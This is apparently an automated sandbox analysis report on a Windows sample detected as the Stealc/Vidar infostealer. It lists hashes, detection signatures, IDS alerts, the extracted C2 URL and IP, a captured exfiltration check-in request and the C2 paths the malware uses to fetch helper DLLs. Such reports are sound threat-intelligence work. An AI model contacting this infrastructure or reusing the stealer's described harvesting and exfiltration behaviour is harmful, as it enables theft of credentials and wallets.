Edit tour

Windows Analysis Report
q27UFusYdn.exe

Overview

General Information

Sample name:	q27UFusYdn.exe renamed because original name is a hash value
Original sample name:	bb88997d394c01230d90aa731f4e8837.exe
Analysis ID:	1430186
MD5:	bb88997d394c01230d90aa731f4e8837
SHA1:	bfce6a6839d2fa159691eaf7ed884e93b481ed35
SHA256:	c1d0339f73af46c63b7ab866c65a1cdc636cfdb12492587cee7bb92486a917f0
Tags:	exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

q27UFusYdn.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\q27UFusYdn.exe" MD5: BB88997D394C01230D90AA731F4E8837)

WerFault.exe (PID: 3804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 2160 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.172.128.111/f993692117a3fda2.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.111/f993692117a3fda2.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2177166200.000000000412C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xbb0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: q27UFusYdn.exe PID: 6672	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: q27UFusYdn.exe PID: 6672	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: q27UFusYdn.exe PID: 6672	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.q27UFusYdn.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.q27UFusYdn.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.q27UFusYdn.exe.43e0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.q27UFusYdn.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.q27UFusYdn.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.q27UFusYdn.exe.43e0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.q27UFusYdn.exe.4410000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.q27UFusYdn.exe.4410000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.q27UFusYdn.exe.4410000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.q27UFusYdn.exe.4410000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Click to see the 7 entries

Snort Signatures

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.111 - Destination IP: 192.168.2.4

Timestamp:	04/23/24-09:26:55.902558
SID:	2051828
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.111

Timestamp:	04/23/24-09:26:54.922166
SID:	2044243
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.111

Timestamp:	04/23/24-09:26:55.903821
SID:	2044246
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.111

Timestamp:	04/23/24-09:26:55.589664
SID:	2044244
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.111 - Destination IP: 192.168.2.4

Timestamp:	04/23/24-09:26:56.219444
SID:	2051831
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGIHost: 185.172.128.111Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 46 33 41 30 45 38 32 43 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 2d 2d 0d 0a Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="hwid"56F3A0E82CA74168869055------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="build"default10------KFCAFIIDHIDGHIECGDGI--

Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.1
Source: q27UFusYdn.exe, 00000000.00000002.2177115350.000000000411E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/freebl3.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/mozglue.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/mozglue.dllt5C
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/msvcp140.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/nss3.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/nss3.dllF5U
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/softokn3.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/softokn3.dll0
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/sqlite3.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dll
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dllc
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.9
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.A
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.I
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.Q
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.a
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.php
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.php$
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.php62dda440aa63685631b0723d92e0release
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpA
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpL
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpPrograms
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpR
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpT
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpb
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpd
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpdpoint
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.000000000417A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpl?
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpodus.wallet
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phprowser
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpt
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.111/f993692117a3fda2.y
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.1Z
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: q27UFusYdn.exe, q27UFusYdn.exe, 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: q27UFusYdn.exe, 00000000.00000002.2196065330.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2187081048.000000001E64A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: q27UFusYdn.exe, 00000000.00000003.1696843810.00000000245CD000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: q27UFusYdn.exe, 00000000.00000003.1696843810.00000000245CD000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, GIIIIJDH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: q27UFusYdn.exe, 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: q27UFusYdn.exe, 00000000.00000003.1817039320.000000002AA6C000.00000004.00000020.00020000.00000000.sdmp, FBFIDBFHDBGIDHJJEGHIIDAFID.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
